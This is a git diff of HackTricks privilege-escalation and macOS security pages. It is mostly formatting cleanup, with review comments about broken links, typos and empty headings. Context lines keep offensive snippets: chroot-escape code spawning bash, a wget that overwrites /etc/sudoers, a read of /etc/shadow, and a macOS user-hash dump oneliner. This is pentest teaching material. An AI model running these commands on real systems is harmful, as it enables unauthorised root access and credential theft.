@@ -2,11 +2,11 @@ ## Automatic Enumeration & Escape -* ****[**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** -* ****[**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** -* ****[**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it -* ****[**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers -* ****[**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image +* [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers** +* [**CDK**](https://github.com/cdk-team/CDK#installationdelivery): This tool is pretty **useful to enumerate the container you are into even try to escape automatically** +* [**amicontained**](https://github.com/genuinetools/amicontained): Useful tool to get the privileges the container has in order to find ways to escape from it +* [**deepce**](https://github.com/stealthcopter/deepce): Tool to enumerate and escape from containers +* [**grype**](https://github.com/anchore/grype): Get the CVEs contained in the software installed in the image ## Mounted Docker Socket Escape diff --git a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md b/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md index f13de214..bc1dd0b8 100644 --- a/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md +++ b/linux-unix/privilege-escalation/docker-breakout/docker-privileged.md 
@@ -154,7 +154,7 @@ Also, note that when Docker (or other CRIs) are used in a **Kubernetes** cluster ### AppArmor -**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. +**AppArmor** is a kernel enhancement to confine **containers** to a **limited** set of **resources** with **per-program profiles**. When you run with the `--privileged` flag, this protection is disabled. {% content-ref url="apparmor.md" %} [apparmor.md](apparmor.md) diff --git a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md index 1295d76a..7af701b7 100644 --- a/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md +++ b/linux-unix/privilege-escalation/electron-cef-chromium-debugger-abuse.md @@ -9,7 +9,7 @@ The abuse of this vulnerability remotely could be as easy as injecting via XSS t ``` -But obviously the exploitation will be **much easier locally**, as you can use a tool such as: [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug)\*\*\*\* +But obviously the exploitation will be **much easier locally**, as you can use a tool such as: [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug) ```bash #List possible vulnerable sockets diff --git a/linux-unix/privilege-escalation/escaping-from-limited-bash.md b/linux-unix/privilege-escalation/escaping-from-limited-bash.md index 9ac6f551..af8fcad3 100644 --- a/linux-unix/privilege-escalation/escaping-from-limited-bash.md +++ b/linux-unix/privilege-escalation/escaping-from-limited-bash.md @@ -27,7 +27,7 @@ int main(void) } chroot("."); system("/bin/bash"); -} +} ``` {% endcode %} @@ -41,7 +41,7 @@ os.chroot("chroot-dir") for i in range(1000): os.chdir("..") os.chroot(".") -os.system("/bin/bash") +os.system("/bin/bash") ``` Using **perl**: 
@@ -120,14 +120,14 @@ BASH_CMDS[shell]=/bin/bash;shell -i You can overwrite for example sudoers file ```bash -wget http://127.0.0.1:8080/sudoers -O /etc/sudoers +wget http://127.0.0.1:8080/sudoers -O /etc/sudoers ``` ### Other tricks [**https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/**](https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/)\ -[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells\*\*]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ -[https://gtfobins.github.io](https://gtfobins.github.io/\*\*]\(https/gtfobins.github.io)\ +[https://pen-testing.sans.org/blog/2012/0**b**6/06/escaping-restricted-linux-shells](https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells**]\(https://pen-testing.sans.org/blog/2012/06/06/escaping-restricted-linux-shells)\ +[https://gtfobins.github.io](https://gtfobins.github.io/**]\(https/gtfobins.github.io)\ **It could also be interesting the page:** {% content-ref url="../useful-linux-commands/bypass-bash-restrictions.md" %} diff --git a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md index aa318f99..894bc94f 100644 --- a/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md +++ b/linux-unix/privilege-escalation/interesting-groups-linux-pe/README.md @@ -98,7 +98,7 @@ So, read the file and try to **crack some hashes**. ## Disk Group - This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. +This privilege is almost **equivalent to root access** as you can access all the data inside of the machine. Files:`/dev/sd[a-z][1-9]` 
diff --git a/linux-unix/privilege-escalation/ld.so.conf-example.md b/linux-unix/privilege-escalation/ld.so.conf-example.md index e53325b2..bc0ac7bf 100644 --- a/linux-unix/privilege-escalation/ld.so.conf-example.md +++ b/linux-unix/privilege-escalation/ld.so.conf-example.md @@ -40,7 +40,7 @@ void say_hi() 1. **Create** those files in your machine in the same folder 2. **Compile** the **library**: `gcc -shared -o libcustom.so -fPIC libcustom.c` -3. **Copy **_**** libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs) +3. **Copy **_ libcustom.so_ to _/usr/lib_: `sudo cp libcustom.so /usr/lib` (root privs) 4. **Compile** the **executable**: `gcc sharedvuln.c -o sharedvuln -lcustom` ### Check the environment @@ -111,7 +111,7 @@ ubuntu Note that in this example we haven't escalated privileges, but modifying the commands executed and **waiting for root or other privileged user to execute the vulnerable binary** we will be able to escalate privileges. {% endhint %} -### Other misconfigurations - Same vuln +### Other misconfigurations - Same vuln In the previous example we faked a misconfiguration where an administrator **set a non-privileged folder inside a configuration file inside `/etc/ld.so.conf.d/`**.\ But there are other misconfigurations that can cause the same vulnerability, if you have **write permissions** in some **config file** inside `/etc/ld.so.conf.d`s, in the folder `/etc/ld.so.conf.d` or in the file `/etc/ld.so.conf` you can configure the same vulnerability and exploit it. diff --git a/linux-unix/privilege-escalation/linux-capabilities.md b/linux-unix/privilege-escalation/linux-capabilities.md index 6e9073fa..55e3e3e0 100644 --- a/linux-unix/privilege-escalation/linux-capabilities.md +++ b/linux-unix/privilege-escalation/linux-capabilities.md 
@@ -764,7 +764,7 @@ And in order to read a file you could do: print(open("/etc/shadow", "r").read()) ``` -#### Example with \_\*\*\_Environment (Docker breakout) +#### Example with \_**\_Environment (Docker breakout) You can check the enabled capabilities inside the docker container using: @@ -1301,7 +1301,7 @@ It looks like we can only add to the inheritable set capabilities from the bound ### CAP\_SYS\_RAWIO -\*\*\*\*[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. +[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`. This can be useful for **privilege escalation** and **Docker breakout.** diff --git a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md index 6364555f..c91e9bc2 100644 --- a/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md +++ b/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md 
@@ -52,7 +52,7 @@ Another required requirement for the exploit to work is that **the export inside \--_I'm not sure that if `/etc/export` is indicating an IP address this trick will work_-- {% endhint %} -**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs\_privesc.html)**** +**Trick copied from** [**https://www.errno.fr/nfs\_privesc.html**](https://www.errno.fr/nfs\_privesc.html) Now, let’s assume that the share server still runs `no_root_squash` but there is something preventing us from mounting the share on our pentest machine. This would happen if the `/etc/exports` has an explicit list of IP addresses allowed to mount the share. diff --git a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md index e238d54b..b858bd87 100644 --- a/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md +++ b/linux-unix/privilege-escalation/splunk-lpe-and-persistence.md @@ -6,7 +6,7 @@ Also if you are **already root and the Splunk service is not listening only on l In the first image below you can see how a Splunkd web page looks like. -**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/)**** +**The following information was copied from** [**https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/**](https://eapolsniper.github.io/2020/08/14/Abusing-Splunk-Forwarders-For-RCE-And-Persistence/) ## Abusing Splunk Forwarders For Shells and Persistence 
@@ -145,4 +145,4 @@ Related blog posts: * https://medium.com/@airman604/splunk-universal-forwarder-hijacking-5899c3e0e6b2 * https://www.hurricanelabs.com/splunk-tutorials/using-splunk-as-an-offensive-security-tool -_\*\* Note: \*\*_ This issue is a serious issue with Splunk systems and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implimentaion of this is dangerous. I attempted to submit this bug via Splunk’s bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions implement the Bug Crowd/Splunk disclosure policy which states no details of the vulnerability may be discussed publically _ever_ without Splunk’s permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this since I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses. +_** Note: **_ This issue is a serious issue with Splunk systems and it has been exploited by other testers for years. While Remote Code Execution is an intended feature of Splunk Universal Forwarder, the implimentaion of this is dangerous. I attempted to submit this bug via Splunk’s bug bounty program in the very unlikely chance they are not aware of the design implications, but was notified that any bug submissions implement the Bug Crowd/Splunk disclosure policy which states no details of the vulnerability may be discussed publically _ever_ without Splunk’s permission. I requested a 90 day disclosure timeline and was denied. As such, I did not responsibly disclose this since I am reasonably sure Splunk is aware of the issue and has chosen to ignore it, I feel this could severely impact companies, and it is the responsibility of the infosec community to educate businesses. 
diff --git a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md index c5f02dcc..545bcada 100644 --- a/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md +++ b/linux-unix/privilege-escalation/ssh-forward-agent-exploitation.md @@ -26,7 +26,7 @@ Another option, is that the user owner of the agent and root may be able to acce ## Long explanation and exploitation -**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/)**** +**Taken from:** [**https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/**](https://www.clockwork.com/news/2012/09/28/602/ssh\_agent\_hijacking/) ### **When ForwardAgent Can’t Be Trusted** diff --git a/linux-unix/privilege-escalation/wildcards-spare-tricks.md b/linux-unix/privilege-escalation/wildcards-spare-tricks.md index b0a13c21..3c0ed6ad 100644 --- a/linux-unix/privilege-escalation/wildcards-spare-tricks.md +++ b/linux-unix/privilege-escalation/wildcards-spare-tricks.md @@ -59,6 +59,6 @@ ln -s /file/you/want/to/read root.txt Then, when **7z** is execute, it will treat `root.txt` as a file containing the list of files it should compress (thats what the existence of `@root.txt` indicates) and when it 7z read `root.txt` it will read `/file/you/want/to/read` and **as the content of this file isn't a list of files, it will throw and error** showing the content. -_More info in Write-ups of the box CTF from HackTheBox._ +_More info in Write-ups of the box CTF from HackTheBox._ __ diff --git a/macos/macos-security-and-privilege-escalation/README.md b/macos/macos-security-and-privilege-escalation/README.md index 562b3973..c2d1c359 100644 --- a/macos/macos-security-and-privilege-escalation/README.md +++ b/macos/macos-security-and-privilege-escalation/README.md 
@@ -5,11 +5,11 @@ Do you want to have access the **latest version of Hacktricks and PEASS**, obtain a **PDF copy of Hacktricks**, and more? Discover the **brand new** [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop?frequency=one-time) **for individuals and companies.** -Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)**** +Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)**** +Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -**Join the** [**💬**](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) **** or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** {% endhint %} 
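Review bot: the touched banner line still carries a mangled link target for the bird emoji, `https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md`, which is a GitHub tree path with an escaped `[https:/emojipedia.org/bird/` fragment glued on and cannot resolve. Since the line is being rewritten to drop the `****` spacers, point the emoji at `https://emojipedia.org/bird/`, matching the speech-balloon link beside it, or remove the link. The identical banner hunk in mobile-apps-pentesting/android-app-pentesting/README.md further down in this patch has the same target and should get the same fix.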
@@ -211,11 +211,11 @@ When the user first installs or runs your software, the presence of a ticket (ei ### File Quarantine Gatekeeper builds upon **File Quarantine.**\ -****Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\ +Upon download of an application, a particular **extended file attribute** ("quarantine flag") can be **added** to the **downloaded** **file**. This attribute **is added by the application that downloads the file**, such as a **web** **browser** or email client, but is not usually added by others like common BitTorrent client software.\ When a user executes a "quarantined" file, **Gatekeeper** is the one that **performs the mentioned actions** to allow the execution of the file. {% hint style="info" %} - **Checking** the **validity** of code signatures is a **resource-intensive** process that includes generating cryptographic **hashes** of the code and all its bundled resources. Furthermore, checking certificate validity involves doing an **online check** to Apple's servers to see if it has been revoked after it was issued. For these reasons, a full code signature and notarization check is **impractical to run every time an app is launched**. +**Checking** the **validity** of code signatures is a **resource-intensive** process that includes generating cryptographic **hashes** of the code and all its bundled resources. Furthermore, checking certificate validity involves doing an **online check** to Apple's servers to see if it has been revoked after it was issued. For these reasons, a full code signature and notarization check is **impractical to run every time an app is launched**. 
Therefore, these checks are **only run when executing apps with the quarantined attribute.** @@ -348,7 +348,7 @@ Bypasses examples: ### SIP - System Integrity Protection This protection was enabled to **help keep root level malware from taking over certain parts** of the operating system. Although this means **applying limitations to the root user** many find it to be worthwhile trade off.\ -The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general: +The most notable of these limitations are that **users can no longer create, modify, or delete files inside** of the following four directories in general: * /System * /bin @@ -391,7 +391,7 @@ System Integrity Protection status: enabled. ``` If you want to **disable** **it**, you need to put the computer in recovery mode (start it pressing command+R) and execute: `csrutil disable` \ -You can also maintain it **enable but without debugging protections** doing: +You can also maintain it **enable but without debugging protections** doing: ```bash csrutil enable --without debug @@ -418,7 +418,7 @@ spctl --assess --verbose /Applications/Safari.app ## Installed Software & Services -Check for **suspicious** applications installed and **privileges** over the.installed resources: +Check for **suspicious** applications installed and **privileges** over the.installed resources: ```bash system_profiler SPApplicationsDataType #Installed Apps 
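Review bot: two of the whitespace-only changes in these macos README.md hunks touch lines that still contain wording errors, and fixing them in the same commit costs nothing: `**privileges** over the.installed resources` should read `over the installed resources`, and `maintain it **enable but without debugging protections**` should read `enabled`. The trailing-space and leading-`****` removals themselves (File Quarantine paragraph, the `info` hint, the SIP paragraph) are correct.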
@@ -839,7 +839,7 @@ The following oneliner can be use to dump **all the information about the users* for l in /var/db/dslocal/nodes/Default/users/*; do if [ -r "$l" ];then echo "$l"; defaults read "$l"; fi; done ``` -****[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**. +[**Scripts like this one**](https://gist.github.com/teddziuba/3ff08bdda120d1f7822f3baf52e606c2) or [**this one**](https://github.com/octomagon/davegrohl.git) can be used to transform the hash to **hashcat** **format**. ### Keychain Dump @@ -876,7 +876,7 @@ Base on this comment [https://github.com/juuso/keychaindump/issues/10#issuecomme ### chainbreaker -****[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: +[**Chainbreaker**](https://github.com/n0fate/chainbreaker) can be used to extract the following types of information from an OSX keychain in a forensically sound manner: * Hashed Keychain password, suitable for cracking with [hashcat](https://hashcat.net/hashcat/) or [John the Ripper](https://www.openwall.com/john/) * Internet Passwords 
@@ -977,11 +977,11 @@ This is like the [**LD\_PRELOAD on Linux**](../../linux-unix/privilege-escalatio This technique may be also **used as an ASEP technique** as every application installed has a plist called "Info.plist" that allows for the **assigning of environmental variables** using a key called `LSEnvironmental`. {% hint style="info" %} -Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader\_osx\_flashback\_b.shtml) \[22] abused this technique, **Apple has drastically reduced the “power”** of the DYLD\_INSERT\_LIBRARIES. +Since 2012 when [OSX.FlashBack.B](https://www.f-secure.com/v-descs/trojan-downloader\_osx\_flashback\_b.shtml) \[22] abused this technique, **Apple has drastically reduced the “power”** of the DYLD\_INSERT\_LIBRARIES. -For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES environment variable in a wide range of cases, such as setuid and platform binaries. And, starting with macOS Catalina, only 3rd-party applications that are not compiled with the hardened runtime (which “protects the runtime integrity of software” \[22]), or have an exception such as the com.apple.security.cs.allow-dyld-environment-variables entitlement) are susceptible to dylib insertions. +For example the dynamic loader (dyld) ignores the DYLD\_INSERT\_LIBRARIES environment variable in a wide range of cases, such as setuid and platform binaries. And, starting with macOS Catalina, only 3rd-party applications that are not compiled with the hardened runtime (which “protects the runtime integrity of software” \[22]), or have an exception such as the com.apple.security.cs.allow-dyld-environment-variables entitlement) are susceptible to dylib insertions. 
-For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened\_runtime)” +For more details on the security features afforded by the hardened runtime, see Apple’s documentation: “[Hardened Runtime](https://developer.apple.com/documentation/security/hardened\_runtime)” {% endhint %} ## Interesting Information in Databases @@ -1224,7 +1224,7 @@ sudo killall -HUP mDNSResponder ## References -* ****[**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** -* ****[**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet)**** -* ****[**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ)**** +* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) +* [**https://github.com/NicolasGrimonpont/Cheatsheet**](https://github.com/NicolasGrimonpont/Cheatsheet) +* [**https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ**](https://assets.sentinelone.com/c/sentinal-one-mac-os-?x=FvGtLJ) diff --git a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md index f310a565..7d3ce597 100644 --- a/macos/macos-security-and-privilege-escalation/mac-os-architecture.md +++ b/macos/macos-security-and-privilege-escalation/mac-os-architecture.md 
@@ -117,11 +117,11 @@ struct mach_header { Filetypes: -* MH\_EXECUTE (0x2): Standard Mach-O executable +* MH\_EXECUTE (0x2): Standard Mach-O executable * MH\_DYLIB (0x6): A Mach-O dynamic linked library (i.e. .dylib) * MH\_BUNDLE (0x8): A Mach-O bundle (i.e. .bundle) -#### **** +#### #### **Load commands** @@ -151,7 +151,7 @@ Common segments: * **`__DATA`**: Contains data that is **writable.** * `__data`: Global variables (that have been initialized) * `__bss`: Static variables (that have not been initialized) - * `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime + * `__objc_*` (\_\_objc\_classlist, \_\_objc\_protolist, etc): Information used by the Objective-C runtime * **`__LINKEDIT`**: Contains information for the linker (dyld) such as, "symbol, string, and relocation table entries." * **`__OBJC`**: Contains information used by the Objective-C runtime. Though this information might also be found in the \_\_DATA segment, within various in \_\_objc\_\* sections. * **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute.** At load time, **dyld** simply **adds** this value to the (in-memory) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code. @@ -187,7 +187,7 @@ A Mach-O binary can contain one or **more** **constructors**, that will be **exe The offsets of any constructors are held in the **\_\_mod\_init\_func** section of the **\_\_DATA\_CONST** segment. {% endhint %} -#### **** +#### #### **Data** 
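Review bot: replacing `#### ****` with a bare `####` leaves an empty level-4 heading in mac-os-architecture.md, and it happens twice (the line before `#### **Load commands**` and the line before `#### **Data**`). An empty ATX heading renders as an empty `<h4>` in GitBook and as the literal text `####` in stricter renderers, so these placeholder lines should be deleted outright rather than trimmed. The trailing-whitespace removals in the filetype list and the `__objc_*` bullet are fine.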
@@ -219,12 +219,12 @@ ls -lR /Applications/Safari.app/Contents Contains **code-signing information** about the application (i.e., hashes, etc.). * `Contents/MacOS` - Contains the **application’s binary** (which is executed when the user double-clicks the application icon in the UI). + Contains the **application’s binary** (which is executed when the user double-clicks the application icon in the UI). * `Contents/Resources` - Contains **UI elements of the application**, such as images, documents, and nib/xib files (that describe various user interfaces). + Contains **UI elements of the application**, such as images, documents, and nib/xib files (that describe various user interfaces). * `Contents/Info.plist`\ - ****The application’s main “**configuration file.**” Apple notes that “the system relies on the presence of this file to identify relevant information about \[the] application and any related files”. + The application’s main “**configuration file.**” Apple notes that “the system relies on the presence of this file to identify relevant information about \[the] application and any related files”. * **Plist** **files** contains configuration information. You can find find information about the meaning of they plist keys in [https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html) * Pairs that may be of interest when analyzing an application include:\ 
@@ -271,5 +271,5 @@ There are some projects that allow to generate a binary executable by MacOS cont ## References -* ****[**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** +* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md index 838ae9a0..17381285 100644 --- a/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md +++ b/macos/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing.md @@ -11,7 +11,7 @@ otool -tv /bin/ps #Decompile application ### SuspiciousPackage -****[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\ +[**SuspiciousPackage**](https://mothersruin.com/software/SuspiciousPackage/get.html) is a tool useful to inspect **.pkg** files (installers) and see what is inside before installing it.\ These installers have `preinstall` and `postinstall` bash scripts that malware authors usually abuse to **persist** **the** **malware**. ### hdiutil 
@@ -32,8 +32,8 @@ When a function is called in a binary that uses objective-C, the compiled code i The params this function expects are: -* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self will point to an instantiated instance of the class as an object. -* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** +* The first parameter (**self**) is "a pointer that points to the **instance of the class that is to receive the message**". Or more simply put, it’s the object that the method is being invoked upon. If the method is a class method, this will be an instance of the class object (as a whole), whereas for an instance method, self will point to an instantiated instance of the class as an object. +* The second parameter, (**op**), is "the selector of the method that handles the message". Again, more simply put, this is just the **name of the method.** * The remaining parameters are any **values that are required by the method** (op). | **Argument** | **Register** | **(for) objc\_msgSend** | 
@@ -148,11 +148,11 @@ sudo dtrace -s syscalls_info.d -c "cat /etc/hosts" ### ProcessMonitor -****[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating). +[**ProcessMonitor**](https://objective-see.com/products/utilities.html#ProcessMonitor) is a very useful tool to check the process related actions a process is performing (for example, monitor which new processes a process is creating). ### FileMonitor -****[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events. +[**FileMonitor**](https://objective-see.com/products/utilities.html#FileMonitor) allows to monitor file events (such as creation, modifications, and deletions) providing detailed information about such events. ### fs\_usage @@ -165,7 +165,7 @@ fs_usage -w -f network curl #This tracks network actions ### TaskExplorer -****[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\ +[**Taskexplorer**](https://objective-see.com/products/taskexplorer.html) is useful to see the **libraries** used by a binary, the **files** it's using and the **network** connections.\ It also checks the binary processes against **virustotal** and show information about the binary. ### lldb 
@@ -287,6 +287,6 @@ Or use `netstat` or `lsof` ## References -* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS)**** -* ****[**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44)**** -* ****[**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)**** +* [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) +* [**https://www.youtube.com/watch?v=T5xfL9tEg44**](https://www.youtube.com/watch?v=T5xfL9tEg44) +* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md index 6b7c1e8c..f764433d 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -106,7 +106,7 @@ It follows a few steps to get the Activation Record performed by **`MCTeslaConfi 5. Make the request 1. POST to [https://iprofiles.apple.com/macProfile](https://iprofiles.apple.com/macProfile) sending the data `{ "action": "RequestProfileConfiguration", "sn": "" }` 2. The JSON payload is encrypted using Absinthe (**`NACSign`**) - 3. All requests over HTTPs, built-in root certificates are used + 3. All requests over HTTPs, built-in root certificates are used ![](<../../../.gitbook/assets/image (566) (1).png>) diff --git a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md b/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md index 2771e627..3096a100 100644 --- a/macos/macos-security-and-privilege-escalation/macos-mdm/enrolling-devices-in-other-organisations.md 
